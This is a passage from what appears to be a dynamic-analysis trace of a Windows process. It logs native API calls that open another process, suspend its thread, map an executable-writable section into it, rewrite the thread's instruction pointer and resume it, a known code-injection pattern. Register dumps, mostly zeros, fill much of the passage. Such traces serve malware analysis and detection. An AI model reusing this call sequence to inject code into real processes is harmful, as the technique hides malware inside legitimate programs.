[52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x19ff14, Ebx=0x566000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x19febc, Eip=0x80a717, SegCs=0x23, EFlags=0x202, Esp=0x19fea4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0137.237] NtResumeThread (in: ThreadHandle=0x1a0, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0137.237] NtClose (Handle=0x1a4) returned 0x0 [0137.237] NtClose (Handle=0x1a0) returned 0x0 [0137.241] NtOpenProcess (in: ProcessHandle=0xdea70, DesiredAccess=0x438, ObjectAttributes=0xdea38*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0xdea50*(UniqueProcess=0x1100, UniqueThread=0x0) | out: ProcessHandle=0xdea70*=0x1a0) returned 0x0 [0137.241] NtQueryInformationProcess (in: ProcessHandle=0x1a0, ProcessInformationClass=0x1a, ProcessInformation=0xdea60, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0xdea60, ReturnLength=0x0) returned 0x0 [0137.241] NtQueryInformationProcess (in: ProcessHandle=0x1a0, ProcessInformationClass=0x0, ProcessInformation=0xde6e4, ProcessInformationLength=0x18, ReturnLength=0x0 | out: ProcessInformation=0xde6e4, ReturnLength=0x0) returned 0x0 [0137.241] NtReadVirtualMemory (in: ProcessHandle=0x1a0, BaseAddress=0x3a7000, Buffer=0xde9f8, NumberOfBytesToRead=0x20, NumberOfBytesRead=0x0 | out: Buffer=0xde9f8*, NumberOfBytesRead=0x0) returned 0x0 [0137.241] NtDelayExecution (Alertable=0, Interval=0xde6cc*=-50000000) returned 0x0 [0137.244] NtOpenThread (in: ThreadHandle=0xdea64, DesiredAccess=0x1a, ObjectAttributes=0xde6b0, ClientId=0xde6c8*(UniqueProcess=0x0, UniqueThread=0x1104) | out: ThreadHandle=0xdea64*=0x1a4) returned 0x0 [0137.244] NtSuspendThread (in: ThreadHandle=0x1a4, PreviousSuspendCount=0x0 | out: PreviousSuspendCount=0x0) returned 0x0 [0137.244] NtMapViewOfSection (in: SectionHandle=0x184, ProcessHandle=0x1a0, BaseAddress=0xde704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde700*=0x9c4000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0xde704*=0x2040000, SectionOffset=0x0, ViewSize=0xde700*=0x9c4000) returned 0x0 [0137.249] NtGetContextThread (in: ThreadHandle=0x1a4, Context=0xde72c | out: Context=0xde72c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x19ff14, Ebx=0x3a7000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x19febc, Eip=0x7561895c, SegCs=0x23, EFlags=0x202, Esp=0x19fea4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0137.254] NtCreateSection (in: SectionHandle=0xde6ec, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0xde6ac, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0xde6ec*=0x1a8) returned 0x0 [0137.254] NtMapViewOfSection (in: SectionHandle=0x1a8, ProcessHandle=0xffffffff, BaseAddress=0xde6f4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde6ac*=0x109200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xde6f4*=0x75d0000, SectionOffset=0x0, ViewSize=0xde6ac*=0x10a000) returned 0x0 [0137.259] NtMapViewOfSection (in: SectionHandle=0x1a8, ProcessHandle=0x1a0, BaseAddress=0xde6f0*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde6e8*=0x109200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xde6f0*=0x2a10000, SectionOffset=0x0, ViewSize=0xde6e8*=0x10a000) returned 0x0 [0137.280] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x75d0000) returned 0x0 [0137.285] NtClose (Handle=0x1a8) returned 0x0 [0137.285] NtSetContextThread (ThreadHandle=0x1a4, Context=0xde72c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x19ff14, Ebx=0x3a7000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x19febc, Eip=0x2a86717, SegCs=0x23, EFlags=0x202, Esp=0x19fea4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, 